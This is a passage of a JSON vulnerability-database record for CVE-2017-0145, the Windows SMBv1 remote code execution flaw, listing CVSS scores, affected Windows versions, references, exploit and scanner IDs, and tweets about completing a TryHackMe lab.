"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", 
"https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 60}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, 
CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 9.1, "vector": "NONE"}}, "hash": "ada0d184ee68bfdc5abae7e38df8ceb1ee5f89184881509c19bce8dd915a641f", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a2952ad882dabbecbfdcf3070d90cae6", "key": "references"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96705", 
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 5}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 
10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", 
"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "b84bcd44aca3858b0bb7f2e51999ef6867747f4caf45ff7a0279c2f0b19588f7", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": 
"01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 59}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": 
"microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": 
["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": 
["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.1, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/tajsec0x/status/1352766309558345729", "text": "Blue - I have just completed this room! Check it out: \n/hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 # CVE-2017-0145 # CVE-2017-0146"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], 